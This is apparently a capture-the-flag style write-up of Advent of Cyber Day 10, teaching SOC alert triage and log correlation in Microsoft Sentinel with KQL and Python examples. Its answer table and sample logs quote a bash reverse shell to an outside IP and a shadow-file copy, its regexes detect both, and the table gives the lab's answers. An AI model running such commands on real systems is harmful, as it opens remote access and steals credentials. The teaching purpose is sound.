Advent of Cyber - DAY-10

🎄 Day 10 – Triaging the Storm: McSkidy vs. the Evil Bunnies in Azure Sentinel

Introduction

At The Best Festival Company (TBFC), the Security Operations Center erupted into chaos. Screens flashed red, alarms echoed like digital thunder, and alerts poured in like a monsoon. Elves sprinted between consoles, their faces illuminated by urgent warnings. Something was clearly wrong.

Rumors soon pointed to a familiar enemy: the Evil Easter Bunnies.

As alerts overwhelmed the SOC, McSkidy knew a crucial rule for survival:

Not every alert deserves your time — triage is everything.


🎯 Learning Objectives

In this exercise, you will learn how to:

  • Perform alert triage and prioritization in a SOC environment

  • Navigate and analyze alerts in Microsoft Sentinel

  • Correlate logs to uncover the true attacker actions

  • Build structured timelines for effective incident response


⚡ Alert Triaging Primer

When alerts flood the SOC, jumping into each one without evaluation leads to chaos. Some alerts are false positives, others are noise, and a few signal a real attack in progress.

Alert triage helps you determine:

  • What must be handled immediately

  • What can safely wait

  • What can be ignored

Without this structured approach, SOC operations become overwhelming.


📝 The Four Dimensions of Triage

Factor                 | Description                            | Why It Matters
-----------------------|----------------------------------------|------------------------------------------
Severity Level         | Informational → Critical               | Indicates urgency & business risk
Timestamp & Frequency  | When and how often the alert occurred  | Reveals patterns or ongoing attacks
Attack Stage           | Kill-chain stage                       | Shows attacker progress
Affected Asset         | Targeted users, systems, resources     | Determines potential impact and priority

In short:
Severity = How bad?
Time = When?
Context = Where in the attack lifecycle?
Impact = Who is affected?
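As an added example (not code from the room or from this write-up), the following Python sketch turns the four dimensions into a single sortable score over a constructed alert queue. The weights, the asset-criticality ratings and every alert record except the kernel-module one are assumptions chosen to illustrate the idea, not values taken from Sentinel:

```python
"""Rank a queue of SOC alerts along the four triage dimensions.

Added example, not code from the Advent of Cyber room: the alert records,
the weights and the asset-criticality map are constructed assumptions
chosen to illustrate the scoring idea, not values taken from Sentinel.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Severity = How bad?  (Sentinel uses Informational/Low/Medium/High; the page adds Critical)
SEVERITY_SCORE = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3, "Critical": 4}

# Context = Where in the attack lifecycle?  Later kill-chain stages mean more attacker progress.
STAGE_SCORE = {
    "Reconnaissance": 1, "Initial Access": 2, "Execution": 2, "Discovery": 2,
    "Privilege Escalation": 3, "Credential Access": 3, "Persistence": 3,
    "Lateral Movement": 4, "Exfiltration": 5, "Impact": 5,
}

# Impact = Who is affected?  Constructed criticality ratings for the lab hosts (assumption).
ASSET_CRITICALITY = {"storage-01": 3, "app-01": 2, "app-02": 2, "websrv-01": 2, "dev-laptop-07": 1}


@dataclass
class Alert:
    name: str
    severity: str
    stage: str
    host: str
    last_seen: datetime
    count: int  # how many times the rule fired in the lookback window


def triage_score(alert: Alert, now: datetime) -> int:
    """Fold the four dimensions into one sortable number (weights are assumptions)."""
    severity = SEVERITY_SCORE.get(alert.severity, 0)
    stage = STAGE_SCORE.get(alert.stage, 1)
    impact = ASSET_CRITICALITY.get(alert.host, 1)
    # Time = When?  Fresh, repeated alerts point to an ongoing attack; older ones decay.
    age_hours = (now - alert.last_seen).total_seconds() / 3600
    recency = 3 if age_hours < 1 else 2 if age_hours < 24 else 1
    frequency = min(alert.count, 5)  # cap so one noisy rule cannot dominate the queue
    return severity * 10 + stage * 4 + impact * 3 + recency * 2 + frequency


def prioritize(alerts, now):
    """Return (score, alert) pairs, most urgent first."""
    return sorted(((triage_score(a, now), a) for a in alerts), key=lambda p: p[0], reverse=True)


# Constructed incident queue; only the first alert name comes from the write-up.
NOW = datetime(2025, 10, 30, 5, 10, tzinfo=timezone.utc)
SAMPLE_ALERTS = [
    Alert("Linux Privilege Escalation - Kernel Module Insertion", "High",
          "Privilege Escalation", "app-01", NOW - timedelta(minutes=5), 3),
    Alert("Failed SSH logins", "Low", "Initial Access", "websrv-01", NOW - timedelta(hours=3), 40),
    Alert("Port scan detected", "Informational", "Reconnaissance", "dev-laptop-07",
          NOW - timedelta(days=2), 1),
    Alert("Large outbound transfer", "Medium", "Exfiltration", "storage-01",
          NOW - timedelta(minutes=30), 1),
]


def ranked_names(alerts=SAMPLE_ALERTS, now=NOW):
    """Alert names in the order an analyst should pick them up."""
    return [alert.name for _, alert in prioritize(alerts, now)]


if __name__ == "__main__":
    for score, alert in prioritize(SAMPLE_ALERTS, NOW):
        print(f"{score:3d}  {alert.severity:<13} {alert.stage:<20} {alert.host:<12} {alert.name}")
```

Running it ranks the High-severity kernel-module alert first, but the Medium-severity exfiltration alert on storage-01 lands a close second because a late kill-chain stage on a critical asset outweighs the lower severity label, while the noisy Low-severity failed-login rule is held back by the frequency cap. That is the point of triaging on all four dimensions rather than sorting by severity alone.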


🛠️ Investigation Process

Once an alert is prioritized:

  1. Investigate alert details

  2. Check related logs

  3. Correlate alerts across entities

  4. Build a timeline of attacker activity

  5. Decide on escalation, further investigation, or closure

  6. Document findings

This structured workflow allows analysts to convert alert chaos into actionable intelligence.


🔌 Environment Setup in Azure Sentinel

To prepare for triage:

  1. Open Microsoft Sentinel in the Azure portal.

  2. Navigate to Syslog_CL in the Logs tab.

  3. Allow logs to ingest fully.

  4. Go to Analytics → Disable all rules → Re-enable to generate incidents.

The SOC simulation environment is now ready for investigation.


🚨 High-Severity Alerts

In the Incidents tab, McSkidy starts with the highest-severity alerts. One stands out:

Linux Privilege Escalation – Kernel Module Insertion

  • Three related events

  • Three entities involved

  • Classified under Privilege Escalation

  • Recent timestamps indicate an ongoing attack

Example Attack Flow:

Alert                            | Indication
---------------------------------|------------------------------
Root SSH login from external IP  | Initial access
SUID discovery                   | Privilege escalation attempt
Kernel module insertion          | Persistence achieved

The puzzle pieces are coming together.


🔎 Diving Deeper – Raw Log Analysis

Using KQL in Sentinel, McSkidy queries app-02:

    set query_now = datetime(2025-10-30T05:09:25.9886229Z);
    Syslog_CL
    | where host_s == 'app-02'
    | project _timestamp_t, host_s, Message

Findings:

  • cp command copying shadow file

  • User Alice added to sudoers

  • backupuser modified by root

  • Malicious kernel module malicious_mod.ko inserted

  • Successful root SSH login

  • Suspicious privilege escalation patterns

These behaviors confirm a coordinated compromise.
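As an added example, not the room's own query or data, here is a Python correlation pass that carries out steps 2 to 4 of the investigation process (check logs, correlate, build a timeline) over constructed Syslog_CL-style rows shaped like the findings above. The log lines, regexes and stage labels are assumptions rather than Sentinel analytics rules, and the IPs come from the documentation ranges already used on this page:

```python
"""Correlate raw Syslog_CL-style records into a per-host attacker timeline.

Added example, not code or data from the Advent of Cyber room: the log
rows are constructed to resemble the Findings above, and the regexes and
stage labels are assumptions, not Sentinel analytics rules.
"""
import re
from collections import defaultdict

# Constructed rows shaped like (_timestamp_t, host_s, Message). Not real room data;
# the IPs are from the documentation ranges used on this page.
SAMPLE_LOGS = [
    ("2025-10-30T05:01:12Z", "app-02", "sshd[2210]: Accepted password for root from 203.0.113.45 port 51822 ssh2"),
    ("2025-10-30T05:02:40Z", "app-02", "sudo: root : COMMAND=/usr/bin/find / -perm -4000 -type f"),
    ("2025-10-30T05:03:05Z", "app-02", "sudo: root : COMMAND=/bin/cp /etc/shadow /tmp/.s"),
    ("2025-10-30T05:04:30Z", "app-02", "usermod[2301]: add 'alice' to group 'sudo'"),
    ("2025-10-30T05:06:01Z", "app-02", "kernel: malicious_mod: loading out-of-tree module taints kernel."),
    ("2025-10-30T05:06:02Z", "app-02", "sudo: root : COMMAND=/sbin/insmod /tmp/malicious_mod.ko"),
    ("2025-10-30T05:00:10Z", "websrv-01", "sudo: ops : COMMAND=/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1"),
    ("2025-10-30T04:59:58Z", "websrv-01", "CRON[1999]: (root) CMD (run-parts /etc/cron.hourly)"),
]

# (regex over Message, kill-chain stage, indication template filled from the regex groups)
INDICATORS = [
    (re.compile(r"Accepted \w+ for root from (\S+)"), "Initial Access", "root SSH login from {0}"),
    (re.compile(r"find / .*-perm [-/]4000"), "Discovery", "SUID binary discovery"),
    (re.compile(r"\bcp\b .*?/etc/shadow"), "Credential Access", "shadow file copied"),
    (re.compile(r"add '(\w+)' to group 'sudo'"), "Privilege Escalation", "user {0} added to sudoers"),
    (re.compile(r"insmod .*?([\w.-]+\.ko)"), "Persistence", "kernel module {0} inserted"),
    (re.compile(r"/dev/tcp/([\d.]+)/(\d+)"), "Execution", "reverse shell to {0}:{1}"),
]


def classify(message):
    """Return (stage, indication) for the first matching indicator, or None for noise."""
    for pattern, stage, template in INDICATORS:
        match = pattern.search(message)
        if match:
            return stage, template.format(*match.groups())
    return None


def build_timeline(rows):
    """Keep only indicator hits, group them per host and sort each host chronologically."""
    timeline = defaultdict(list)
    for ts, host, message in rows:
        hit = classify(message)
        if hit:
            stage, indication = hit
            timeline[host].append((ts, stage, indication))
    for events in timeline.values():
        events.sort()  # ISO-8601 UTC timestamps sort correctly as strings
    return dict(timeline)


def stages_for(host, rows=SAMPLE_LOGS):
    """Kill-chain stages observed on one host, in time order."""
    return [stage for _, stage, _ in build_timeline(rows).get(host, [])]


if __name__ == "__main__":
    for host, events in sorted(build_timeline(SAMPLE_LOGS).items()):
        print(f"== {host} ==")
        for ts, stage, indication in events:
            print(f"  {ts}  {stage:<20}  {indication}")
```

The output for app-02 reads as the attack story the room wants you to reconstruct: root SSH login, SUID discovery, shadow file copy, sudoers change, kernel module insertion, in that order, with the cron noise and the kernel taint message filtered out. In a real Sentinel investigation you would do the same correlation with KQL joins and `summarize` over the incident's entities; the Python version just makes the grouping and sorting explicit.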


✅ Investigation Answers

Question                                                  | Answer
----------------------------------------------------------|--------------------------------------------------
Kernel module installed in websrv-01?                     | malicious_mod.ko
Unusual command executed by ops user in websrv-01?        | /bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1
Source IP for first successful SSH login to storage-01?   | 172.16.0.12
External IP that logged in as root to app-01?             | 203.0.113.45
User added to sudoers on app-01 besides backupuser?       | deploy

🏁 Conclusion

Day 10 highlights the art and science of SOC alert triage. Through Microsoft Sentinel, McSkidy transformed overwhelming alerts into actionable intelligence by:

  • Prioritizing alerts effectively

  • Understanding the context of related events

  • Correlating attacker activity

  • Analyzing logs deeply

  • Mapping the attacker’s sequence

Even clever attackers like the Evil Bunnies can be countered with structured triage and proactive SOC workflows.

Lesson: In a SOC, clarity comes from prioritization. Every alert has a story—your job is to read it carefully.

